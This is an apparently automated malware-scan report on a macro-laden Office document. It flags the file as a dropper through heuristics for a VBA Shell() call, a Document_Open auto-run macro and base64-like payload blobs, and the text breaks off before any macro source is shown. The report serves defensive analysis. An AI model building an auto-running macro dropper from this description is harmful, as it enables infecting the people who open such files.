Verdict: MALICIOUS
Risk Score: 184

Malware Insights

MITRE ATT&CK: T1059.005 Visual Basic; T1204.002 Malicious File
The critical heuristic 'OLE_VBA_SHELL' indicates the presence of a Shell() call within the VBA macro, which is commonly used to execute downloaded payloads. The 'Document_Open' macro suggests automatic execution upon opening the document. The ClamAV detection name 'Doc.Dropper.Agent-6957340-0' further supports its nature as a dropper.
Heuristics (6)

- ClamAV: Doc.Dropper.Agent-6957340-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6957340-0
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 20229 bytes |

SHA-256: 1afa3e86dac67787ee18735fb187f7727e9ddadbef614c2f9e8cdc71e7c9cb73

Detection: ClamAV: No threats found
Obfuscation or payload: likely (carved artifact contains 3 long base64-like blob(s))

Preview script (first 1,000 lines of the extracted script):